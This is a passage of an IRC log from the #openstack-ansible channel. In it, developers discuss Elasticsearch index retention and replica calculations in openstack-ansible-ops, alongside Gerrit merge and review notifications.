cloudnullbut worth testing regardless.19:52
*** savvas has joined #openstack-ansible20:03
*** savvas_ has quit IRC20:07
openstackgerritMerged openstack/openstack-ansible-ops master: Add arcsight ingestion into logstash  https://review.openstack.org/58499720:15
openstackgerritMerged openstack/openstack-ansible-ops master: Further tune the playbooks, configs, and thread pool  https://review.openstack.org/58556720:37
*** hachi has joined #openstack-ansible20:39
*** ansmith has quit IRC20:42
cloudnullanyone want to give https://review.openstack.org/#/c/573509/ a push ?20:44
cloudnullit's the last one of that series that can go in20:45
*** tux_ has quit IRC20:46
openstackgerritJonathan Rosser proposed openstack/openstack-ansible-ops master: Make index retention calculation pluggable  https://review.openstack.org/58634820:48
*** tux_ has joined #openstack-ansible20:48
openstackgerritGuilherme  Steinmuller Pimentel proposed openstack/openstack-ansible-os_monasca master: [WIP] Configure grafana  https://review.openstack.org/58632220:49
cloudnulljrosser nice!20:50
jrosser:)20:50
jrossersadly i didnt get as far as i wanted20:50
jrosserbut i wanted you to see that to get the idea20:51
jrossercloudnull: btw does the existing retention calc account for the 2x replication?20:51
cloudnullyes/ish. It calc based on the data nodes total storage.20:53
jrosseri think this is why it makes my head hurt a bit - first thing i would do is divide the total storage by <N> replicas20:54
cloudnullcurator should shrink the indexes after two days to minimize the replication however all of that could be a lot better.20:54
jrosseranyway - i figured a test could multiply all the numbers back up again20:55
*** savvas has quit IRC20:56
jrosserretention * hosts * estimated GB / day * replicas and see how that looked compared to the total storage20:56
cloudnullthat'd be a good test20:57
jrossernow the clculation tasks can be included that should be easier20:58
cloudnullI'd love to have a good long hack session on retention policies, i think that's the next big thing to get done.20:59
cloudnullthe rest of the stack seems to running quite well.21:00
jrosserthe upgrade i did yesterday and you latest tune-ups seem to have really settled my dato nodes down21:00
cloudnullthat said, if you have something in the works aready, carry on :)21:00
jrosserwell like i say i didnt get as far as i'd like - too many meetings + firefighting :/21:01
cloudnullthe struggle is real !21:01
jrosserit'll be a few days before i get serious time on it - likewise throw something in if you have any ideas21:02
*** dcdamien has quit IRC21:04
*** hamerins has joined #openstack-ansible21:06
cloudnullhttps://github.com/openstack/openstack-ansible-ops/search?q=number_of_replicas&unscoped_q=number_of_replicas21:09
cloudnullopps devx ^21:09
devxcloudnull that will do it thanks.. I'll get a patch out to calculate it based on your ndoes.. probably won't get to it until monday21:11
cloudnullsomething like : number_of_replicas: "{{ ((data_nodes | length) > 1) | ternary(1, 0) }}" should do it21:12
cloudnullok21:12
*** Darcidride has quit IRC21:12
devxor i can just copy what you have and create the patch. LOL21:12
*** savvas has joined #openstack-ansible21:33
*** dcdamien has joined #openstack-ansible21:33
*** hamerins has left #openstack-ansible21:34
*** jwitko has quit IRC21:38
openstackgerritMerged openstack/openstack-ansible-tests master: Add jmespath to test-requirements.txt  https://review.openstack.org/58633021:40
*** cshen has quit IRC22:01
*** storshoo has quit IRC22:06
*** storshoo has joined #openstack-ansible22:09
*** jwitko has joined #openstack-ansible22:13
*** tux_ has quit IRC22:15
*** hachi has quit IRC22:19
*** tux_ has joined #openstack-ansible22:26
*** gkadam has quit IRC22:30
*** tux_ has quit IRC22:31
openstackgerritMohammed Naser proposed openstack/openstack-ansible-os_magnum master: Use keystone_auth for credentials  https://review.openstack.org/58374522:58
openstackgerritMohammed Naser proposed openstack/openstack-ansible-os_magnum master: Disable sending metrics for clusters  https://review.openstack.org/58375122:58
*** lbragstad_ has joined #openstack-ansible23:01
*** lbragstad has quit IRC23:01
*** speedmann has quit IRC23:18
*** speedmann has joined #openstack-ansible23:23
*** speedmann has quit IRC23:25
*** speedmann has joined #openstack-ansible23:29
*** speedmann has joined #openstack-ansible23:30
*** speedmann has quit IRC23:31

Generated by irclog2html.py 2.15.3 by Marius Gedminas - find it at mg.pov.lt!